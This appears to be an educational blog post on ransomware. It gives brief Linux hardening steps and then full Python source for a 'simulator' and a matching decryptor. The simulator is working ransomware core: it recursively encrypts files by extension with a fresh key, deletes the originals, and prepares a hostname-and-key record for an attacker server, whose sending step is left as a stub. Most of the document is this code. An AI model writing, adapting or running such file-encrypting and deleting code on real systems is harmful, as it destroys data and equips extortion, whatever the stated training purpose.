Ransomware is malware that encrypts your data with a key held by the attacker. After the attack, the data is locked and cannot be recovered without that key. It is the most dangerous malware of the decade, and its effects are often impossible to undo. As a professional, I had the chance to respond to a live ransomware attack alongside a blue team. Here I am sharing simulation code for educational purposes, together with steps to protect your device or organization from such threats.
Before experimenting with the simulation code, secure your environment: run it only in an isolated virtual machine, with a snapshot taken beforehand, against throwaway copies of files. Then follow these steps to harden a Linux system (such as Kali):
1. Update your system (this refreshes the package index; follow it with `sudo apt upgrade` to install the pending updates):
sudo apt update
2. Install and configure a firewall (UFW); after installing, turn it on with `sudo ufw enable`:
sudo apt install ufw
If you are using SSH, disable root login (`PermitRootLogin no` in the sshd configuration) and restart the service. Always keep backups in an external, offline location, so that a ransomware run on the host cannot reach them.
3. Install ClamAV Antivirus:
sudo apt install clamav clamav-daemon
Update the signature database and scan regularly:
sudo freshclam
sudo clamscan -r /
Warning: I am not responsible for any loss of data. Do not run any code unless you totally understand it. This is for educational purposes only. Run at your own risk.
import gc
import os
import json
import uuid
import ctypes
import socket
import subprocess
from cryptography.fernet import Fernet
class RansomwareSimulator:
    """Minimal ransomware behaviour model for the blue-team exercise.

    It walks ``directory``, encrypts every file whose name ends with one of
    ``file_extensions`` using a freshly generated Fernet key, writes the
    ciphertext beside the original with a ``.denizhalil`` suffix and deletes
    the original.  The key exists only in memory (``self.key``): if the
    process exits before that value is recorded, the files cannot be
    recovered, which is precisely the property the exercise demonstrates.

    Run it only inside an isolated lab VM against throwaway copies of files.

    NOTE(review): ``gc``, ``json``, ``uuid``, ``ctypes`` and ``subprocess``
    are imported at the top of this listing but not used anywhere in it.
    """

    def __init__(self, directory, server_host, server_port, file_extensions):
        # Root of the tree that will be walked; everything below it is in scope.
        self.directory = directory
        # Stored only; nothing in this listing connects to them
        # (send_data_to_server is a stub).
        self.server_host = server_host
        self.server_port = server_port
        # Name suffixes that select victim files (compared with str.endswith).
        self.file_extensions = file_extensions
        # Fresh symmetric key for this run; this attribute is its only copy.
        self.key = Fernet.generate_key()

    def encrypt_file(self, file_path):
        """Encrypt one file: write ``<file_path>.denizhalil`` and remove the original.

        The whole file is read into memory, so very large files are bounded
        by available RAM.  The original is removed only after the ciphertext
        has been written.  Returns the path of the encrypted file.

        Detection note: a burst of read / create-with-new-suffix / unlink
        operations across many files is the file-activity pattern produced
        by this step.
        """
        fernet = Fernet(self.key)
        with open(file_path, 'rb') as file:
            original = file.read()
        encrypted = fernet.encrypt(original)
        encrypted_file_path = file_path + ".denizhalil"
        with open(encrypted_file_path, 'wb') as encrypted_file:
            encrypted_file.write(encrypted)
        os.remove(file_path)
        return encrypted_file_path

    def find_and_encrypt_files(self):
        """Walk ``self.directory`` and encrypt every file matching an extension.

        Matching is a plain suffix test, so the list in ``file_extensions``
        decides the blast radius; there is no size limit, exclusion list or
        dry-run mode.
        """
        for root, _, files in os.walk(self.directory):
            for file in files:
                if any(file.endswith(ext) for ext in self.file_extensions):
                    file_path = os.path.join(root, file)
                    self.encrypt_file(file_path)

    def send_data_to_server(self):
        """Stub: build the record a real sample would send to its operator.

        Deliberately unimplemented, and never called from ``main`` below.
        The defensive point is the shape of ``data``: hostname plus the
        decoded key, i.e. the one record the attacker needs and the one an
        egress/network monitor should be looking for.
        """
        data = {'hostname': socket.gethostname(), 'key': self.key.decode()}
        # Logic to send to server...
def main():
    """Run the simulation against the hard-coded lab directory.

    All settings are fixed lab values: three extensions, the relative
    ``dosyalar/`` directory and a private-range (10.0.2.x) server address.
    Keep the directory relative and small so the blast radius stays inside
    the lab checkout.  Note that the generated key is never printed or
    saved here, so a run that does not record ``simulator.key`` afterwards
    leaves the files unrecoverable.
    """
    file_extensions = ['.txt', '.docx', '.jpg']
    directory = 'dosyalar/'
    simulator = RansomwareSimulator(directory, '10.0.2.37', 12345, file_extensions)
    simulator.find_and_encrypt_files()
# Entry-point guard: importing this module for inspection does not start the walk.
if __name__ == "__main__":
    main()
import os
from cryptography.fernet import Fernet
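class Decoder:
    """Recovery tool for files produced by the simulator.

    Walks ``directory`` and, for every file ending in ``.denizhalil``,
    decrypts it with the supplied Fernet key, writes the plaintext under the
    original name and removes the ciphertext file.
    """

    # Suffix the simulator appends to every file it encrypts.
    SUFFIX = ".denizhalil"

    def __init__(self, directory):
        # Root of the tree to walk; everything below it is in scope.
        self.directory = directory

    @staticmethod
    def _original_path(file_path):
        """Return ``file_path`` with one trailing ``.denizhalil`` removed.

        Only the final suffix is stripped.  A ``str.replace`` would also
        erase the token from the middle of a name (e.g. ``a.denizhalil.txt``)
        and could write the plaintext to the wrong path.  A path without the
        suffix is returned unchanged.
        """
        suffix = Decoder.SUFFIX
        if file_path.endswith(suffix):
            return file_path[:-len(suffix)]
        return file_path

    def decrypt_file(self, file_path, key):
        """Decrypt one ``.denizhalil`` file and restore the original.

        Args:
            file_path: path of the encrypted file; must end in ``.denizhalil``.
            key: the Fernet key recorded when the files were encrypted
                (``str`` or ``bytes``).

        Raises:
            ValueError: ``file_path`` lacks the suffix (the plaintext would
                otherwise be written over the ciphertext and then deleted),
                or ``key`` is not a valid Fernet key.
            cryptography.fernet.InvalidToken: wrong key or altered file.

        Both the key check and the decryption happen before anything is
        written, and the ciphertext file is removed only after the plaintext
        file has been written and closed, so a failure at any point leaves
        the encrypted copy on disk.
        """
        if not file_path.endswith(self.SUFFIX):
            raise ValueError(
                "not an encrypted file (missing {} suffix): {}".format(self.SUFFIX, file_path)
            )
        fernet = Fernet(key)
        with open(file_path, 'rb') as encrypted_file:
            encrypted_data = encrypted_file.read()
        decrypted_data = fernet.decrypt(encrypted_data)
        original_file_path = self._original_path(file_path)
        with open(original_file_path, 'wb') as plain_file:
            plain_file.write(decrypted_data)
        os.remove(file_path)

    def find_and_decrypt_files(self, key):
        """Walk ``self.directory`` and decrypt every ``.denizhalil`` file with ``key``."""
        for root, _, files in os.walk(self.directory):
            for name in files:
                if name.endswith(self.SUFFIX):
                    self.decrypt_file(os.path.join(root, name), key)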
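def main():
    """Prompt for the key recorded at encryption time and restore ``dosyalar/``.

    The key is the URL-safe base64 text produced by ``Fernet.generate_key``.
    Surrounding whitespace from copy/paste is stripped; an empty or malformed
    key makes ``Fernet`` raise ``ValueError`` on the first encrypted file it
    meets, before anything is written.
    """
    key = input("Enter decryption key: ").strip()
    decoder = Decoder('dosyalar/')
    decoder.find_and_decrypt_files(key)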
# Entry-point guard: importing this module does not prompt for a key.
if __name__ == "__main__":
    main()
Final Warning: Do not run any of this code without deep technical knowledge of how file systems and encryption work.